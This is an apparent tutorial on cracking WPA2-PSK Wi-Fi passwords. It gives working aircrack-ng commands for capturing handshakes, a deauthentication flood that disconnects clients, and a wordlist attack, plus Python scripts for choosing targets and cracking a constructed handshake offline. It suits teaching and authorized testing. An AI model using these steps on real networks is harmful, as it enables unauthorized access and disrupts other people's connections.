Intro to Wireless Hacking

Wireless LANs arrived in the 1990s with WEP (Wired Equivalent Privacy) as their only protection, but geniuses like you found a whole pile of ways to crack it, and today WEP falls in minutes. After a lot of grinding over the encryption design, computer scientists and security researchers replaced it with WPA and then WPA2-PSK.

WPA2-PSK is WiFi Protected Access 2 with a pre-shared key. WPA2 swapped WEP's RC4 for AES (CCMP), and that cipher is not what we attack; nobody here breaks AES. The weak point is the pre-shared key itself: it is derived from a passphrase a human typed in, and if that passphrase is guessable, the network is open. Read the steps below and take this mountain too.

But yes, you need to be properly technical for this one, because getting onto someone else's network is not small stuff and belongs only on a network you own or are authorized to test. Once you are in, you sit on the same LAN as every connected device, which is exactly why it matters.

Basic Algorithm behind the hack

The weak point of a WPA2-PSK network is the 4-way handshake. The password itself never travels over the air, encrypted or otherwise; what does travel is enough to check a guess. When a client authenticates to the access point (for kiddos: when you connect to a wifi), both sides derive the Pairwise Master Key (PMK) from the passphrase and the SSID, exchange two random nonces (ANonce from the AP, SNonce from the client), derive a session key from the PMK, the nonces and the two MAC addresses, and prove they hold it by putting a MIC (a keyed hash) on the handshake messages. Nonces, MAC addresses, SSID and MIC all go out in the clear, so anyone who captured the handshake can take a candidate password from a wordlist, redo the same derivation offline and see whether the MIC matches. That is the whole attack: capture one handshake with the adapter described next, then let aircrack-ng grind through a dictionary.


Hardware required

Just a WiFi adapter that supports monitor mode (and packet injection, for the deauth step), such as the Leoxys 150N, the Alpha 150 mbps (recommended one) or the Alpha 1900 (best one). Many built-in laptop cards can listen but cannot inject, so check before you start.

Step 1: Initiating Monitor mode

First, we have to put the wifi adapter (one of the compatible ones listed above) into monitor mode. In easy words, the adapter stops being a client and instead listens to all the wireless traffic floating past in the air. Stop NetworkManager and wpa_supplicant first with airmon-ng check kill, otherwise they keep resetting the interface under you.

We can do it by opening the terminal and typing:

$: airmon-ng start wlan0


airmon-ng renames our wlan0 adapter to wlan0mon (older versions create a separate mon0 instead; use whatever name airmon-ng prints in the commands below)

Step 2: Capturing wireless traffic

This is done to capture all the traffic in the air that passes by our adapter. For this we take help from the command airodump-ng.

$: airodump-ng wlan0mon

This command lists every access point and client it hears, with the critical information for each: BSSID (the AP's MAC address), ESSID (network name), number of beacon frames, power, channel, speed, encryption (WEP, WPA, WPA2 or OPN) and the authentication type (PSK or MGT). Only WPA/WPA2 with PSK is a target for this method: open networks have no handshake and MGT (802.1X enterprise) networks have no shared passphrase to guess.

Step 3: Targeting the AP we want

In this step we lock onto the access point we want and capture its traffic to disk. For this we need the BSSID and the channel of the target AP from the previous listing. Open another terminal and run:

$: airodump-ng --bssid C4:9F:4C:F8:0F:7F -c 11 --write WPAcrack wlan0mon

C4:9F:4C:F8:0F:7F is the BSSID of the target AP

-c 11 locks the adapter on channel 11, the channel of the AP; without it the adapter keeps hopping and will miss part of the handshake

--write WPAcrack is the prefix for the capture files; airodump-ng writes WPAcrack-01.cap (plus a .csv and other exports), which holds the handshake, not the password

wlan0mon is the name of the monitor interface

airodump-ng now shows only that one AP at the top and, below it, the stations (clients) associated with it. Note a client MAC: we need at least one connected client to get a handshake, and we can aim the deauth at it.
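
Steps 2 and 3 hinge on reading the BSSID, channel and clients off the airodump-ng listing, so here is an added example (written for this page, not aircrack-ng code) that pulls them out of the CSV export airodump-ng writes next to the .cap when you use --write (WPAcrack-01.csv for the command above). The file has two tables separated by a blank line, access points first, then stations; the sample embedded in the script is constructed to follow that layout, reusing the article's BSSID, and is not a real capture. The filter keeps only WPA/WPA2 networks with PSK authentication and attaches the stations airodump-ng saw associated with each, which is exactly what the next two steps need.

```python
"""Pick WPA/WPA2-PSK targets out of an airodump-ng CSV export (added example)."""
import csv
import re
from io import StringIO

# Constructed sample following the layout of <prefix>-01.csv: an access-point
# table, a blank line, then a station table. Not from a real capture.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
C4:9F:4C:F8:0F:7F, 2024-05-01 10:00:01, 2024-05-01 10:04:59, 11, 130, WPA2, CCMP, PSK, -41, 210, 0,   0.  0.  0.  0,  7, HomeNet, 
02:00:00:00:AA:01, 2024-05-01 10:00:02, 2024-05-01 10:04:58,  6,  54, OPN, , , -70,  80, 0,   0.  0.  0.  0,  9, CafeGuest, 
02:00:00:00:AA:02, 2024-05-01 10:00:03, 2024-05-01 10:04:57,  1, 130, WPA2, CCMP, MGT, -55, 150, 0,   0.  0.  0.  0,  8, CorpWiFi, 
02:00:00:00:AA:03, 2024-05-01 10:00:04, 2024-05-01 10:04:56,  6, 130, WPA2 WPA, CCMP TKIP, PSK, -62,  90, 0,   0.  0.  0.  0, 10, Neighbour5, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2024-05-01 10:00:10, 2024-05-01 10:04:50, -45, 320, C4:9F:4C:F8:0F:7F, HomeNet
66:77:88:99:AA:BB, 2024-05-01 10:01:00, 2024-05-01 10:03:00, -80,   9, (not associated), CafeGuest
"""


def _table(block: str):
    """Parse one comma-separated table into (header, rows), dropping empty rows."""
    reader = csv.reader(StringIO(block), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    rows = [[f.strip() for f in row] for row in reader if any(f.strip() for f in row)]
    return header, rows


def parse_airodump_csv(text: str):
    """Return (access_points, stations): lists of dicts keyed by the CSV header names."""
    parts = re.split(r"\n\s*\n", text.strip(), maxsplit=1)
    ap_block = parts[0]
    sta_block = parts[1] if len(parts) > 1 else ""
    header, rows = _table(ap_block)
    # Tolerate a row missing the trailing empty 'Key' field, drop anything shorter.
    aps = [dict(zip(header, row)) for row in rows if len(row) >= len(header) - 1]
    stations = []
    if sta_block.strip():
        header, rows = _table(sta_block)
        stations = [dict(zip(header, row)) for row in rows]
    return aps, stations


def psk_targets(aps, stations):
    """Keep WPA/WPA2 networks with PSK auth: OPN has no handshake to capture and
    MGT (802.1X) has no shared passphrase to guess. Attach associated clients."""
    clients_by_bssid = {}
    for s in stations:                     # '(not associated)' never matches an AP
        clients_by_bssid.setdefault(s["BSSID"], []).append(s["Station MAC"])
    targets = []
    for ap in aps:
        if "WPA" not in ap["Privacy"] or ap["Authentication"] != "PSK":
            continue
        targets.append({
            "bssid": ap["BSSID"],
            "essid": ap["ESSID"],
            "channel": int(ap["channel"]),
            "power_dbm": int(ap["Power"]),
            "clients": clients_by_bssid.get(ap["BSSID"], []),
        })
    # Strongest signal first: a weak link yields a garbled or missing handshake.
    targets.sort(key=lambda t: t["power_dbm"], reverse=True)
    return targets


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for t in psk_targets(aps, stations):
        print(f"{t['essid']!r} {t['bssid']} ch {t['channel']} "
              f"{t['power_dbm']} dBm clients={t['clients']}")
```

Run it against your own WPAcrack-01.csv by replacing SAMPLE_CSV with the file's contents; the BSSID, channel and client MAC of the first entry are what go into the airodump-ng lock and the aireplay-ng deauth in the next steps.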

Step 4: Using aireplay-ng for deauth

Now, to capture the handshake, we need a client to authenticate against the access point while we are listening. If a client is already connected we simply de-authenticate it; its device will reconnect automatically and the fresh 4-way handshake lands in our capture. For this, open another terminal and run:

$: aireplay-ng --deauth 100 -a C4:9F:4C:F8:0F:7F wlan0mon

100 is the number of de-authentication frames we send; a handful (5 to 10) is normally enough and far less noisy, and 0 means keep sending forever

-a C4:9F:4C:F8:0F:7F is the BSSID of the access point; add -c with a station's MAC to kick only that one client instead of everyone on the AP

wlan0mon is the name of our monitor interface

Step 5: Capturing the handshake

In the previous step we forced the client off the network; when its device reconnects, airodump-ng records the 4-way handshake. Go back to the airodump-ng terminal: the top line should now read WPA handshake: C4:9F:4C:F8:0F:7F. That is the signal that we have what we need to test guesses against; it is not the password, which at this point is still unknown. If it does not appear, deauth again and make sure the adapter is locked on the right channel.

Step 6: Cracking the captured handshake

Now we use our main weapon, aircrack-ng, to run a dictionary attack against the handshake we grabbed from the re-authentication between the client and the AP. Nothing is decrypted here: aircrack-ng takes each word from the wordlist, derives the keys exactly as the client did, recomputes the MIC and compares it with the captured one. So the whole step stands or falls with the wordlist, in easy words a list of candidate passwords. Run:

$: aircrack-ng -w rockyou.txt -b C4:9F:4C:F8:0F:7F WPAcrack-02.cap

here, WPAcrack-02.cap is the capture file airodump-ng wrote (the suffix counts up each time you start a capture with the same prefix, so pick the one that holds the handshake)

-w rockyou.txt is our wordlist (on Kali it lives gzipped under /usr/share/wordlists/)

-b C4:9F:4C:F8:0F:7F selects the network in case the capture contains more than one

How long this takes depends on CPU and GPU speed (the wifi adapter plays no part once the handshake is on disk) and, above all, on whether the password is in the wordlist. Each guess costs 4096 rounds of PBKDF2-HMAC-SHA1, so a CPU manages only a few thousand guesses per second; a GPU with hashcat manages far more, but a random password of 8 or more characters mixing upper case, lower case, digits and symbols is out of reach by brute force, and the attack only succeeds when the wordlist contains it. When a word matches, aircrack-ng prints KEY FOUND! with the password; otherwise it exhausts the list and reports that the passphrase was not found.
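
To make the basic algorithm section above and Step 6 concrete, here is an added example (written for this page, not aircrack-ng's code) of the offline dictionary attack in Python. It constructs a WPA2 4-way handshake for a made-up network (SSID HomeNet, the article's BSSID, a constructed client MAC, fixed nonces and a constructed wordlist), computes the MIC the client would place on EAPOL message 2 for the true passphrase, and then recovers that passphrase by recomputing the MIC for every candidate. The key derivation (PBKDF2-HMAC-SHA1 to the PMK, the 802.11i PRF to the PTK, HMAC-SHA1-128 for the MIC) and the EAPOL-Key frame layout are the real ones; everything about the network itself is an assumption.

```python
"""Offline WPA2-PSK dictionary attack against a 4-way handshake (added example).

Nothing in the handshake is the password. The attacker recomputes the MIC of
EAPOL message 2 for every candidate passphrase and stops when it matches.
"""
import hashlib
import hmac

# --- constructed network parameters (assumptions, not from a real capture) ---
SSID = b"HomeNet"
AP_MAC = bytes.fromhex("c49f4cf80f7f")      # BSSID used throughout the article
STA_MAC = bytes.fromhex("001122334455")     # constructed client address
ANONCE = bytes(range(0x00, 0x20))           # constructed nonce from message 1
SNONCE = bytes(range(0x20, 0x40))           # constructed nonce from message 2
TRUE_PASSPHRASE = "letmein123"              # what the "victim" AP is configured with
WORDLIST = ["password", "12345678", "letmein", "qwerty", "letmein123", "iloveyou"]

# Standard RSN IE advertising CCMP + PSK, as a client echoes it in message 2.
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def kck_from_pmk(pmk, aa, spa, anonce, snonce) -> bytes:
    """First 128 bits of the PTK (the Key Confirmation Key) key the EAPOL MIC.
    Addresses and nonces are ordered so both sides derive the same PTK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def build_eapol_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """EAPOL-Key message 2 (WPA2, key descriptor version 2 = HMAC-SHA1-128).
    Layout per 802.1X/802.11i: SNonce at bytes 17..48, MIC at bytes 81..96."""
    body = (
        b"\x02"                               # descriptor type: RSN
        + b"\x01\x0a"                         # key info: MIC | pairwise | version 2
        + b"\x00\x00"                         # key length (0 in message 2)
        + replay_counter.to_bytes(8, "big")
        + snonce
        + bytes(16)                           # key IV
        + bytes(8)                            # RSC
        + bytes(8)                            # key ID (reserved)
        + bytes(16)                           # MIC, zero until computed
        + len(RSN_IE).to_bytes(2, "big")
        + RSN_IE
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, EAPOL-Key


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the whole frame with the MIC field zeroed; algorithm from key-info bits 0-2."""
    version = eapol[6] & 0x07
    zeroed = eapol[:81] + bytes(16) + eapol[97:]
    if version == 1:                          # WPA/TKIP: HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                          # WPA2/CCMP: HMAC-SHA1 truncated to 128 bits
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {version}")


def capture_handshake(passphrase: str) -> bytes:
    """Simulate the client finishing message 2, i.e. what airodump-ng would record."""
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    frame = build_eapol_msg2(SNONCE)
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]


def crack(eapol_msg2: bytes, wordlist, ssid=SSID, aa=AP_MAC, spa=STA_MAC, anonce=ANONCE):
    """Dictionary attack: recompute the MIC per candidate; return the match or None.
    SSID, MACs and ANonce come from the beacon / 802.11 headers / message 1 in the .cap."""
    captured_mic = eapol_msg2[81:97]
    snonce = eapol_msg2[17:49]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:     # WPA passphrases are 8 to 63 characters
            continue
        kck = kck_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    captured = capture_handshake(TRUE_PASSPHRASE)
    print("recovered passphrase:", crack(captured, WORDLIST))
```

The point to take away: the loop does no decryption. Every guess costs the same 4096 HMAC-SHA1 rounds of PBKDF2 whatever the passphrase is, candidates outside 8 to 63 characters are skipped because they cannot be WPA passphrases, and the only thing that decides the outcome is whether the real passphrase sits in the list.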

